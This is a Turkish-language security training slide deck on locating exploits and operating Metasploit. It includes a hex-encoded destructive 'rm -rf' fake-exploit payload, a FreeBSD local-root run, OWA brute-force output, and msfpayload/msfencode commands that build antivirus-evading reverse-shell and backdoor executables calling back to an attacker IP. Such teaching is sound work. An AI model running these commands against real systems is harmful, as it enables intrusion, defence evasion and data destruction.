  79. 79. @BGASecurity BGA | Metasploitexploit-db.com • En güncel ve güvenilir exploit araştırma sitesi • Açıklığı barındıran uygulamanın güncel olmayan sürümüne erişim bilgisi de sunar. • Web tabanlı açıklıklar içn Google üzerinde arama imkanı sunar. • Gönderilen exploitler bir kalite kontrol sürecinden geçer, fake exploitleri kabul etmezler
  80. 80. @BGASecurity BGA | MetasploitSecurityFocus
  81. 81. @BGASecurity BGA | Metasploitpacketstormsecurity.com
  82. 82. @BGASecurity BGA | MetasploitGoogle ? • Bazı exploitler exploit-db ve securityfocus’da olmayabilir • Bu tip exploit aramalarında en sağlıklı yollardan biri Google’a sormaktır • Bind DOS açıklığı exploiti araştırması • Internetten indirilecek her exploit güvenilir midir? • Örnek:
  83. 83. @BGASecurity BGA | MetasploitSahte Exploit Kavramı • Ava giderken avlanma! • Exploit vs gibi konularda yeterli bilgi sahibi olmayan meraklı “hacker”ları kandırmak ve sistemlerini ele geçirmek amacıyla –genellikle eğlence amaçlı- gerçekleştirilir. • Exploit kodu (payload kısmı) genellikle hex encode edilerek verilir. • Exploit çalıştırıldığında çalıştığı sistemi silebilir, başka sistemlere bilgi taşıyabilir.
  84. 84. @BGASecurity BGA | MetasploitSahte Exploit Örneği-I
  85. 85. @BGASecurity BGA | MetasploitSahte Exploit Örneği-II char jmpcode[] = "x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2f" "x64x65x76x2fx6ex75x6cx6cx20x26"; ?????r?m? ?-?r?f? ?~? ?/?*? ?2?>? ?/??????d?e?v?/?n?u?l?l? ?&? "rm -rf ~ /* 2> /dev/null &"
  86. 86. @BGASecurity BGA | MetasploitExploit Çalıştırma • Script tabanlı exploitler • Python, Perl ile yazılmış exploitler • C/C++ dilleri ile yazılmış exploitlerin çalıştırılması • Her exploitin çalıştırılmaıs için gerekli komut satırı parametreleri farklıdır. • Her sistem, her sistemde yüklü olan yama seviyesine göre farklı exploit çalıştırmak gerekebilir. • Script tabanlı exploitlerin payloadları genellikle iki tane olur (bind TCP, reverse TCP)
  87. 87. @BGASecurity BGA | MetasploitExploit Geliştirme/Çalıştırma • Exploit geliştirme ve çalıştırma birbirinden farklı işlemlerdir • Exploit geliştirme ve güvenlik zafiyet bulma birbirinden farklı uzmanlık isteyen konulardır. • Exploit geliştirme günümüzde işletim sistemlerinin getirdiği ek korumalar (geliştirme kütüphanelerinin de) sayesinde oldukça zor bir hale getirilmiştir. • Exploit çalıştırma en basit işlemdir. • Oku, izle, kur çalıştır!
  88. 88. @BGASecurity BGA | MetasploitExploit Çalıştırmanın Zararları • Bazı exploit denemeleri hedef sistemin durmasına, servisin zedelenmesine veya crash o lmasına neden olabilir. • Pentest çalışmalarında önce exploit lab. Ortamında denenmeli
  89. 89. @BGASecurity BGA | MetasploitC Tabanlı Exploitlerin Çalıştırılması
  90. 90. @BGASecurity BGA | MetasploitOtomatize Exploit Çalıştırma • Neden ihtiyaç duyuldu? • Binlerce exploit var • Her exploit belirli bir sisteme(işletim sistemi, yazılım versiyonu) özel yazılıyor. • Kurulum dili bile farklı olsa exploit çalışmayabilir • Tüm bunları aşmak için bir framework gerekir
  91. 91. @BGASecurity BGA | MetasploitOtomatik Exploit Çalıştırma Eksileri • Hangi durumlarda otomatik exploit çalıştırma araçları avantajlı/dezavantajlı olur? • Özellikle local exploitlerde (Linux kernelini ilgilendiren) metasploit için geliştirilmiş exploit yoktur. • Bu durumda internet üzerinden araştırma yapılarak bulunabilir. • Exploitin indirileceği site herhangi bir site olmamalıdır (sahte exploitlere önlem olarak)
  92. 92. @BGASecurity BGA | MetasploitJboss Jmx-console Örneği • Metasploit Jboss exploitleri stabil değildir. • 4 uyuglamadan 3’ü sağlıklı çalışmamaktadır.
  93. 93. @BGASecurity BGA | MetasploitJboss Metasploit’siz Exploit Denemesi http://www.exploit-db.com/exploits/16274/
  94. 94. @BGASecurity BGA | MetasploitLinux Local Root Exploiti Arama • Linux kernel versiyonu belirleme • Uname –a http://rmccurdy.com/scripts/downloaded/localroot/ # uname -a FreeBSD s-guard19 8.1-RELEASE FreeBSD 8.1- RELEASE #0: Tue Dec 21 08:21:08 CST 2010 root@server3:/usr/obj/usr/src/sys/server3 amd64$ uname -a Linux bt5r2 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
  95. 95. @BGASecurity BGA | MetasploitUygulama|FreeBSD Local Root Exploit %uname -a;id; FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 uid=1001(kcope) gid=1001(users) groups=1001(users) %./w00t.sh FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl‘ ALEX-ALEX # uname -a;id; FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386 uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
  96. 96. @BGASecurity BGA | MetasploitOtomatize Exploit Araçları • Core Impact • Immunity Canvas • ExploitPack • Metasploit Framework • W3af • Sqlmap (Metasploit desteğiyle)
  97. 97. @BGASecurity BGA | MetasploitCore Impact
  98. 98. @BGASecurity BGA | MetasploitImmunity Canvas
  99. 99. @BGASecurity BGA | MetasploitExploitpack
  100. 100. @BGASecurity BGA | MetasploitMetasploit
  101. 101. @BGASecurity BGA | MetasploitMetasploit Framework Projesi • Metasploit Framework projesi exploit teknikleri ile istismarları hakkında bilgi sağlamakta. • Oluşturduğu yapı ile güvenlik denetçilerine, IDS imza geliştirme ve istismar araştırmaları yapan uzmanlara, hackerlara faydalı bilgiler vermekte ve exploit geliştiricileri için bir çatı oluşturmaktadır. • Metasploit bir toplum projesi Metasploit LLC tarafından yönetilmekteydi. • Rapid7 firmasına satıldıkdan sonra Pro ve Community sürümleri ile devam etmektedir.
  102. 102. @BGASecurity BGA | MetasploitMetasploit Tarihçesi • İlk olarak ağ güvenliği oyunu amaçlı geliştirilmiştir • Sonraları perl tabanlı bir exploit geliştirme çatısı olarak kullanıma sunuldu • Haziran 2004 : 2.1 stable sürümü yayınlandı • Mart 2007 3.0 stable sürümü yayınlandı • Eski sürümlerde perl temel alınırken yeni sürümlerde tamamen Ruby’e geçilmiş durumda
  103. 103. @BGASecurity BGA | MetasploitMetasploit Framework | Özellikleri Özellikleri ; • Community ve Pro sürümleri bulunmakta. • 800 exploits - 435 auxiliary - 134 post -246 payloads – 27 encoders - 8 nop bulunuyor • Çok farkli türde payload’lar kullanilabiliyor • Meterpreter • VNC DLL Injection • Binary Upload • PassiveX • Çok sayida farkli encoder kullanilabiliyor; alpha2, Pex, Shikata Ga Nai, Sparc, Countdown, JpmCallAdditive, PexFnstenvSub • Konsol (msfconsole), program arayüzü(msfgui) ve web arabirimi (msfpro) bulunuyor. • Farklı işletim sistemlerinde (Linux, Windows,Mac OS X) çalışabiliyor.
  104. 104. @BGASecurity BGA | MetasploitMetasploit Framework | Kurulum • Metasploit Framework (MSF), Windows işletim sistemleri de dahil olmak üzere, geniş bir yelpazede çalışır. • Windows 2000/XP/2003, Linux, OpenBSD, FreeBSD ve Mac OS X işletim sistemlerini destekler. Windows İşletim Sistemlerine Kurulumu Metasploit Framework ün kurulumu son derece basittir.4 adımda kurulumunu gerçekleştirebilirsiniz. http://www.metasploit.com/framework/download/ adresinden en son sürümünü bilgisayarınıza indirerek kurulumu başlatabilirsiniz. Next > Next > Next > Next > Next > Finish NOT: Nmap ve Winpcap programları, Metasploit ile birlikte gelmektedir.Sisteminizde mevcut değilse kurmanız önerilir.
  105. 105. @BGASecurity BGA | MetasploitMetasploit Framework | Kurulum Linux için kurulum Metasploit Framework ün Linux tabanlı işletim sistemlerine kurulumu farklılık göstermektedir. Metasploit Framework’ün Ubuntu/Kubuntu Linux için Kurulumu: https://community.rapid7.com/docs/DOC-1296 Metasploit Framework’ün Android için Kurulumu: https://community.rapid7.com/docs/DOC-1039 Metasploit Framework’ün Iphone için Kurulumu: http://dev.metasploit.com/redmine/projects/framework/wiki/Install_iPhone Mac OS X için Kurulum https://community.rapid7.com/docs/DOC-1037
  106. 106. @BGASecurity BGA | MetasploitMetasploit Framework | Güncelleme • Metasploit hızla gelişen bir araçtır. • Hergün, her saat yeni güvenlik açıkları keşfedilmekte ve bunları sömüren kodlar yazılmaktadır. • Yeni payload ,encoder, exploit, ve NOP hazırlandığında metasploiti update ederek kullanabilirsiniz.
  107. 107. @BGASecurity BGA | MetasploitMetasploit Framework | Güncelleme Linux sistemlerde komut satırından “msfupdate” komutu çalıştırılarak güncelleme yapılır.
  108. 108. @BGASecurity BGA | MetasploitPayload Nedir ? • Exploit sonrasi çalisip yetkisiz islevi gerçeklestirecek içerik. • Lambadan çıkan cinin sahibine sorduğu soru.
  109. 109. @BGASecurity BGA | MetasploitÜst Düzey Bazı Payloadlar Metasploit Frameworkde kullanılan üst düzey farklı işlevselliğe sahip payloadlar bulunmaktadır. Bunlardan bazıları ; • Meterpreter • DLL Injection • Binary Upload • PassiveX • Download and Exec • Adduser
  110. 110. @BGASecurity BGA | MetasploitShellcode Nedir ? • Exploit sonrasi çalisicak olan platforma özel binary’ler. • Metasploit’de bulunan payload’ların farklı dillerde shellcode çıktısı alınabilir.
  111. 111. @BGASecurity BGA | MetasploitEncoder Nedir ? • Metasploit Encoder, istenilen payloadın içeriğini değiştirerek Saldırı Tespit ve Engelleme Sistemleri (IDS/IPS), Güvenlik Duvarları (Firewall) ve Antivirüsler tarafından tanınmasını engeller/zorlaştırır. • Metasploit Frameworkde 27+ encoder bulunuyor.
  112. 112. @BGASecurity BGA | MetasploitMetasploit Encoder Çeşitleri Msfencode Kullanım Parametreleri
  113. 113. @BGASecurity BGA | MetasploitMetasploit Encoder Çeşitleri-II Encoder Listesi
  114. 114. @BGASecurity BGA | MetasploitMetasploit Encoder Kullanımı Encoder Kullanımı Shellcode’u msfpayload ile raw formatında msfencode a aktarıp içeriği encode edebilirsiniz. # msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112 LPORT=4443 R | msfencode –e x86/shikata_ga_nai -t exe –o /var/www/payload.exe
  115. 115. @BGASecurity BGA | MetasploitMetasploit Multi Encoder Kullanımı • Multi-Encoder Kullanımı Payload içeriği bir çok encoder ile değiştirilerek yeniden oluşturulabilir. # msfpayload windows/meterpreter/reverse_tcp LHOST=6.6.6.112 LPORT=4443 R | msfencode –e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload2.exe [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4) ….
  116. 116. @BGASecurity BGA | MetasploitNop Nedir ? “Not Operation” , bellek yeri öğrenme amaçlı bellek dolduran bitler. Genellikle saldırı tespit ve engelleme sistemlerini yanıltmak için kullanılır.
  117. 117. @BGASecurity BGA | MetasploitMetasploit NOP Çeşitleri İsim Açıklama ------- --------------- ppc/simple Simple sparc/random SPARC NOP generator x86/opty2 Opty2 x86/single_byte Single Byte
  118. 118. @BGASecurity BGA | MetasploitAuxiliary Nedir? • Modüller için geliştirilmiş ek programcıklar, yardımcı araçlardır. • Exploit öncesi bilgi toplamak, exploit sonrası hedef sistemde ilerlemek için kullanılır. • Metasploit’de en fazla kullanılan bileşenlerden biri Aux modülleridir.
  119. 119. @BGASecurity BGA | MetasploitMetasploit AUX Modülleri Auxiliary İsmi Açıklama ----------------- ----------- dos/windows/smb/ms06_035_mailslot Microsoft SRV.SYS Mailslot Write dos/windows/smb/rras_vls_null_deref Microsoft RRAS Interface AdjustVLSPointers NULL Dereference recon_passive Simple Recon Module Tester scanner/discovery/sweep_udp UDP Service Sweeper scanner/mssql/mssql_login MSSQL Login Utility scanner/mssql/mssql_ping MSSQL Ping Utility scanner/scanner_batch Simple Recon Module Tester scanner/scanner_host Simple Recon Module Tester scanner/scanner_range Simple Recon Module Tester scanner/smb/version SMB Version Detection testSimple Auxiliary Module Tester
  120. 120. @BGASecurity BGA | MetasploitMetasploit Araçlarını Anlamak Metasploit , birden fazla araç ile arayüz kullanımı sağlar.Bu araçlar farklı şartlar ve durumlarda yüksek derecede esneklik sağlar ; • Tek bir kullanıcı, tek bir hedef sömürme • Bir kullanıcının bir oturum sırasında birden çok hedefi, • Toplu iş modunda yönetebilmesi • Aynı anda birden fazla oturum açma • Payload oturumlarını askıya alma ve yenileme • Başka kullanıcılar ile Payload oturumlarını paylaşma • Güvenlik denetimi yapan grubun aynı ağda veya farklı ağlarda iş birliği
  121. 121. @BGASecurity BGA | MetasploitMsfgui • Metasploit 3.x ile birlikte gelen arayüzdür.Msfgui ile birlikte exploitler , payloadlar, auxiliaryler kullanılabilir. • Msfgui başlatmak için Windows sistemlerde Programs | Metasploit 3 | Metasploit 3 GUI bağlantısı izlenerek erişim kurulabilir. • Unix türevi sistemlerde msfgui’ye erişim için metasploit framework’un kurulu olduğu dizine gidilerek “msfgui” komutu ile metasploit arayüzü başlatılabilir ve “-h” parametresi ile seçenekler listelenebilir.
  122. 122. @BGASecurity BGA | MetasploitMSFGUI | Console
  123. 123. @BGASecurity BGA | MetasploitMSFGUI | Arama Expoit, Payload ve Auxiliary araması
  124. 124. @BGASecurity BGA | MetasploitMSFGUI | Exploit Seçimi “exploits” menüsünden kategorilenmiş exploitler görüntülenir ve kullanılır.
  125. 125. @BGASecurity BGA | MetasploitMSFGUI | Exploit Çalıştırma 1. Adım: Hedef ve Payload Seçimi 2. Adım: Exploit ve Payload için gerekli ayarlar 3. Adım: Gelişmiş ayarlar ve “exploit”
  126. 126. @BGASecurity BGA | MetasploitMSFGUI | Exploit Çalıştırma
  127. 127. @BGASecurity BGA | MetasploitMsfconsole • Metasploit komut satırı aracıdır. Unix sistemlerde metasploit dizinine geçilerek “msfconsole” komutu yazılarak başlatılır. • Windows sistemlerde ise web arayüzünden “Console” seçilerek erişim kurulur. • Msfconsole ile payloadlar, exploitler, encoderlar, NOP lar ve auxiliary modulleri kullanılabilir. • Metasploit komut satırı (msfconsole) açılışında metasploit logosu gelir.
  128. 128. @BGASecurity BGA | MetasploitMsfconsole msfconsole dan bir görünüm
  129. 129. @BGASecurity BGA | MetasploitMsfconsole msfconsole dan bir görünüm msfconsole, farklı türlerde eğlenceli bannerlara sahiptir.”banner” komutu ile diğer bannerler görüntülenebilir
  130. 130. @BGASecurity BGA | MetasploitMsfconsole Yardım seçeneklerinin görüntülenmesi (help) • Bu temel komutların açıklamalarına bir göz atalım. • En çok kullanılan temel komutlar, ilerleyen konularda uygulamalı olarak yer almaktadır.
  131. 131. @BGASecurity BGA | MetasploitMsfconsole | Temel Komutlar Temel Komutlar ============== Komut Açıklama ------- -------------- ? Yardım menüsü Back Mevcut seçenekten bir adım geriye döner banner Metasploit açılış bannerlarını gösterir Cd Dizin atlamak için kullanılır color Renk seçeneklerini ayarlar connect Uzak bir sunucuya bağlantı kurar exit Konsoldan çıkışı sağlar Help Yardım menüsü info Bir veya daha fazla modul hakkında bilgi verir irb İrb scripting modunu getirir Jobs Yapılan işleri gösterir ve düzenler kill Çalışan bir görevi öldürür. Load Framework için eklenti yükler Loadpath Belirtilen yoldan istenilen modulu/exploiti yükler makerc Başlangıçtan itibaren kullanılan komutları bir dosyaya yazar quit Konsoldan çıkışı sağlar route Oturumun trafik rotasını belirler Save Etkin veriyi kayıteder, depolar Set Ayarların konfigure edilmesinde kullanılan atama komutu setg Genel bir değer, değişken atar show Belirtilen modülü veya tüm modülleri listeler Sleep Verilen zaman içinde uyku moduna geç, birşey yapma Unload Framework için mevcut eklentiyi kaldırır unset Atanan değeri kaldırır unsetg Yapılan genel bir değeri, değişkeni kaldırır use Modülü seçer Version Konsol uygulamasının versiyonunu gösterir search Modül ismi veya açıklamalarda arama yapar sessions Aktif oturumları gösterir ve oturum bilgisi verir
  132. 132. @BGASecurity BGA | MetasploitBilgi Toplama Amaçlı Aux Modülleri Örnek Aux modülleri • use auxiliary/scanner/ftp/ftp_login • use auxiliary/scanner/http/brute_dirs • use auxiliary/scanner/http/dir_scanner • use auxiliary/scanner/http/jboss_vulnscan • use auxiliary/scanner/http/open_proxy • use auxiliary/scanner/http/tomcat_enum
  133. 133. @BGASecurity BGA | MetasploitMsfconsole | Auxiliary | Port Scanning Port tarama için arka planda nmap kullanır. Port tarama araçlarını görüntülemek için portscan araması yapılabilir.
  134. 134. @BGASecurity BGA | MetasploitMsfconsole | Auxiliary | TCP Scan
  135. 135. @BGASecurity BGA | MetasploitMsfconsole | Auxiliary | Brute Force Metasploit, exploit öncesi ve sonrası parola deneme saldırıları için bir çok protokolü ve uygulamayı destekleyen yardımcı araçlar barındırmaktadır.
  136. 136. @BGASecurity BGA | MetasploitMsfconsole | Auxiliary | OWA Brute Force msf > search owa Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/http/owa_login normal Outlook Web App (OWA) Brute Force Utility
  137. 137. @BGASecurity BGA | MetasploitMsfconsole | Auxiliary | OWA Brute Force msf auxiliary(owa_login) > set USERPASS_FILE /root/owa_test USERPASS_FILE => /root/owa_test msf auxiliary(owa_login) > set RPORT 443 RPORT => 443 msf auxiliary(owa_login) > set VHOST mail.HEDEF_SITE.com.tr VHOST => mail.HEDEF_SITE.com.tr msf auxiliary(owa_login) > run [*] mail.HEDEF_SITE.com.tr:0 OWA – Testing version 2010 [*] mail.HEDEF_SITE.com.tr:443 OWA – Testing version 2010 [-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘ali’ : ‘ali’ [*] mail.HEDEF_SITE.com.tr:443 OWA – Trying sam : sam [-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘sam’ : ‘sam’ [*] mail.HEDEF_SITE.com.tr:443 OWA – Trying user : user [*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : grt [-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’: ‘grt’ [*] Auxiliary module execution completed
  138. 138. @BGASecurity BGA | MetasploitMsfconsole | Auxiliary | Wordpress
  139. 139. @BGASecurity BGA | MetasploitMsfconsole | Auxiliary | SSH Brute Force
  140. 140. @BGASecurity BGA | MetasploitMsfconsole | Auxiliary |MSSQL Brute Force
  141. 141. @BGASecurity BGA | MetasploitMsfconsole | Auxiliary | MSSQL Enumeration
  142. 142. @BGASecurity BGA | MetasploitMsfconsole | Auxiliary | DNS Enum ve Zone Transfer ns2 için zone transferi başarısız, fakat ns1 için zone transferi başarılı
  143. 143. @BGASecurity BGA | MetasploitMsfconsole | Auxiliary | SMB Version Belirleme • SMB Version Detection modülü, işletim sistemi hakkında bilgi sağlar. 445. porttan çalışan smb servisinden hedef işletim sisteminin versiyon bilgisini alır. • Bu bilgi, hedef sisteme saldırı öncesi exploit ve payload seçiminde faydalı olacaktır. • Hedefte bir Linux çalışıyorsa, Samba versiyonunu tespit edecektir.
  144. 144. @BGASecurity BGA | MetasploitMetasploit Aux DoS Modülleri • Metasploit kullanarak DoS saldırısı gerçekleştirme/deneme çalışmaları • Örnek Aux modülleri • use auxiliary/dos/tcp/synflood • use auxiliary/dos/wifi/ssidlist_beacon • use auxiliary/dos/wifi/fakeap
  145. 145. @BGASecurity BGA | MetasploitMsfconsole | Exploiting Exploit Kullanımı Bu bölüm; temel komutlarla exploit seçimi, seçeneklerin yapılandırılmasını ve çalıştırmayı içermektedir.
  146. 146. @BGASecurity BGA | MetasploitExploit Arama Arama kriterleri
  147. 147. @BGASecurity BGA | MetasploitMsfconsole | Exploit Arama • Örnek arama kriterleri ; - Name Açıklayıcı bir ada göre arama yapmak için “name” anahtar sözcüğünü kullanılır. msf > search name:codesys
  148. 148. @BGASecurity BGA | MetasploitMsfconsole | Exploit Arama • Örnek arama kriterleri ; - Path “path“ anahtarı kullanarak, bir dizin altında arama yapılabilir msf > search path:scada
  149. 149. @BGASecurity BGA | MetasploitMsfconsole | Exploit Arama • Örnek arama kriterleri ; - Platform Belli bir platforma özgü arama yapmak için “platform” anahtarı kullanılabilir. msf > search platform:linux
  150. 150. @BGASecurity BGA | MetasploitMsfconsole | Exploit Arama • Örnek arama kriterleri ; - Type Modül türüne göre, örneğin exploits, payloads, auxiliarys vb. arama yapmak için kullanılır. msf > search type:post
  151. 151. @BGASecurity BGA | MetasploitMsfconsole | Exploit Arama • Örnek arama kriterleri ; - Author Yayımlacıyı kriterine göre arama yapmayı sağlar. msf > search author:celil
  152. 152. @BGASecurity BGA | MetasploitMsfconsole | Exploit Arama • Örnek arama kriterleri ; - Multiple Birden fazla kritere göre arama yapabilirsiniz, bu sayede arama sonucu daraltmış olursunuz. msf > search cve:2011 author:jduck platform:linux
  153. 153. @BGASecurity BGA | MetasploitMsfconsole | Exploit Hakkında Bilgi Exploit Hakkında Bilgi Almak Exploit seçiminden önce, exploit hakkında detaylı bilgi almak için “info” komutu kullanılabilir. En temel kullanımı “info exploit_adı” şeklindedir.
  154. 154. @BGASecurity BGA | MetasploitMsfconsole | Exploit Seçimi • Exploit Seçimi Herhangi bir arama kriterleri yoksa, kullanılabilir exploit’lerin tamamını görüntülemek için “show exploits” komutu kullanılabilir. • Exploit seçimi, “use” komutu ile yapılmaktadır. msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >
  155. 155. @BGASecurity BGA | MetasploitMsfconsole | Exploit Seçimi Exploit seçimi yapıldıkdan sonra, exploit için işlem menüsü ile karşılacaksınız.Exploit komutlarını listelemek için yardım komutunu (help) kullanabiliriz. Exploit Komutları ve açıklamaları aşağıdaki gibidir; Komut Açıklama ---------- ----------- Check Exploit öncesi güvenlik açığının kontrolü yapar. exploit Exploiti tetikler. pry Seçili modül için pry oturumu başlatır. rcheck Hedef sistemin zayıflığını tekrar kontrol eder reload Yalnızca module yükler rexploit Exploiti tekrar çalıştırır.
  156. 156. @BGASecurity BGA | MetasploitMsfconsole | Payload Seçimi Payload Seçimi Geçerli exploit için kullanılabilir payload’ları listelemek için, “show payloads” komutu kullanılır.
  157. 157. @BGASecurity BGA | MetasploitMsfconsole | Payload Seçimi “info” komutu istenilen payload,exploit hakkında detaylı bilgi alanabilir. Örnek olarak “infowindows/vncinject/reverse_tcp” komutu VNC Inject payloadı hakkında detaylı bilgi sunar.
  158. 158. @BGASecurity BGA | MetasploitMsfconsole | Payload Seçimi “İnfo” komutu ile seçilen payload için gerekli seçenekler ve varsayılan olarak atanan değerler listelenir. Payload seçimi için “set PAYLOAD payload_adı” komutu kullanılır. Örnekte kullandığımız VNC Inject payloadı için bu komut “set PAYLOAD windows/vncinject/reverse_tcp” şeklinde olucaktır.
  159. 159. @BGASecurity BGA | MetasploitMsfconsole | Seçenekler • Seçeneklerin Ayarlanması Exploit ve payload seçiminden sonra, uygulanacak hedef ve gerekli seçenekler belirtilmelidir. • Exploit ve Payload seçeneklerini “show options” komutu ile görüntüleyebiliriz.
  160. 160. @BGASecurity BGA | MetasploitMsfconsole | Seçenekler Required sütününda “yes” ile belirtilen seçeneklerin mutlaka belirtilmesi gerekir. Bu ayarlar şöyle yapılır ; • RHOST = hostname veya ip adresi yazılabilir • LHOST = saldırıyı yapan sistemin ip adresi. • LPORT = Hedef ile iletişim kurulacağı yerel port. Firewall , IDS/IPSleri atlatmak için 443. portu kullanmanız önerilir. LPORT ile belirticeğiniz portun sisteminizde açık ve filtrelenmemiş olması gerekir.
  161. 161. @BGASecurity BGA | MetasploitMsfconsole | Exploit
  162. 162. @BGASecurity BGA | MetasploitMsfconsole | Exploit Sonrası • Exploitin sonrası VNC ekran görüntüsü
  163. 163. @BGASecurity BGA | MetasploitMsfcli • Msfcli aracı, unix ve windows sistemler için komut satırından çalışan msfconsole benzeri bir arayüzüdür.Özellikle scripting işlemlerinde sıkça tercih edilir. • Msfcli ile gerekli parametreler kullanılarak istenilen exploit hedefe gönderilir. Msfcli arayüzünün kullanım parametreleri ve açıklamaları aşağıdaki gibidir. Kullanımı : ./msfcli <exploit_adi> <seçenek=değer> [parametre] Parametre Açıklama -------------- ----------- (H)elp Yardım komutu (S)ummary Seçilen exploit hakkında bilgi verir (O)ptions Seçilen exploit için gerekli seçenekleri listeler (A)dvanced Seçilen exploit için gelişmiş seçenekleri listeler (I)DS Evasion IDS yakalanmamak için kullanılabilir seçenekleri listeler. (P)ayloads Seçilen exploit için kullanılabilir payloadları listeler (T)argets Exploitin uygulanabileceği hedefleri listeler (AC)tions Seçilen exploit ile birlikte kullanılabilecek yardımcı araçları listeler (C)heck Exploitin hedef sisteme uygunluğunu çek eder (E)xecute Seçilen exploiti çalıştırır
  164. 164. @BGASecurity BGA | MetasploitMsfcli Msfcli kullanılarak bir hedefi istismar etmek için kullanılacak en basit yol; 1. ./msfcli <exploit_adı> S = Seçilen exploit hakkında bilgi verir. 2. ./msfcli <exploit_adı> P = Seçilen exploit için kullanılabilir payloadları listeler. 3 . ./msfcli <exploit_name> PAYLOAD=<payload_adı> O = Exploit için gerekli seçenekleri listeler 4. ./msfcli <exploit_name> PAYLOAD=<payload_adı> T = Exploitin uygulanabileceği hedefler 5. Kullanılacak exploitler için seçenekleri ve değerlerini belirttikden sonra E parametresi ile exploit çalıştırılır.
  165. 165. @BGASecurity BGA | MetasploitMsfcli • Exploit Seçimi ve Seçeneklerin Görüntülenmesi # msfcli exploit/multi/samba/usermap_script O
  166. 166. @BGASecurity BGA | MetasploitMsfcli • Exploit için kullanılabilir payload’ların listesi # msfcli exploit/multi/samba/usermap_script P
  167. 167. @BGASecurity BGA | MetasploitMsfcli • Seçeneklerin belirtilmesi ve exploitin uygulanması # msfcli exploit/multi/samba/usermap_script PAYLOAD=generic/shell_reverse_tcp LHOST=6.6.6.112 RHOST=linux.bga.com.tr RPORT=139 E linux.bga.com.tr adresine, samba exploitini uygula ve shell_reverse payloadını yükleyip 6.6.6.112 adresine komut satırını ilet.
  168. 168. @BGASecurity BGA | MetasploitMsfcli
  169. 169. @BGASecurity BGA | MetasploitMsfpayload • Msfpayload aracı, metesploitde kullanılan payloadları derlemek için kullanılır. • Exploit geliştiricileri exploit yazarken, payloadlarada ihtiyaç duyarlar bu noktada msfpayload exploit geliştiricileri için bulunmaz nimettir. • Metasploit’in msfpayload aracı sayesinde istenilen payloadın çıktısı C , Perl, Ruby, Raw, Javascript, VBA ve exe olarak alınabilir.
  170. 170. @BGASecurity BGA | MetasploitMsfpayload msfpayload -h parametresi ile temel kullanımını,seçeneklerini ve payloadları görebilirsiniz. Kullanımı:
  171. 171. @BGASecurity BGA | MetasploitMsfpayload Kullanılabilir payload’ları listelemek
  172. 172. @BGASecurity BGA | MetasploitMsfpayload Payload Seçeneklerini Görüntülemek
  173. 173. @BGASecurity BGA | MetasploitMsfpayload Seçenekler listesinde “Required”bölümündeki alanlar mutlaka doldurulmalıdır. Bazı seçenekler varsayılan olarak tanımlı gelmektedir.
  174. 174. @BGASecurity BGA | MetasploitMsfpayload Seçenekleri Belirlemek Payload seçeneklerini belirlemek oldukça basittir, aşağıdaki örnekde olduğu gibi söz dizimi kullanarak ayarlar belirlenebilir.
  175. 175. @BGASecurity BGA | MetasploitMsfpayload
  176. 176. @BGASecurity BGA | MetasploitMsfpayload Farklı dillerde shellcode oluşturmak Payloadın farklı formatlarda shellcode çıktısını alabiliriz, örneğin; C,Perl,raw,java,js vb.
  177. 177. @BGASecurity BGA | MetasploitMsfpayload Payload Derlemek Windows sistemlerde çalışacak şekilde çalıştırılabilir, exe dosyası oluşturalım. msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 X > backdoor.exe
  178. 178. @BGASecurity BGA | MetasploitMeterpreter • Meterpreter , Meta-Interpreter ‘in kısaltılmışıdır. • Modül destekli üst düzey bir payload’tır. • Açık kaynak kodlu kolayca geliştirilebilir, kendi eklentilerinizi geliştirmenize izin verir ve DLL olarak yeni modüller eklenebilir. • Meterpreterin çalıştığı sistemlerde anti-virüs yazılımları, nids tarzı yazılımlardan korunmak için içerik dahili kriptolama özelliği mevcuttur.
  179. 179. @BGASecurity BGA | MetasploitMeterpreter • MSF 3.x ile birlikte yeni gelen ; • Süreç birleştirme, IRB script desteği ,Timestomp ve SAM HashDump özellikleri mevcut. Meterpreter yeni bir alt süreç olarak doğrudan bellekte çalışıyor bu sayede hacking sonrası kurban bilgisayarda iz bırakmaz ve adli delil toplamada saldırıya dair iz bulunması zorlaşır. • Meterpreter de esnekliği ve kullanım kolaylığı olan bir dizi komut ve eklenti bulunuyor.
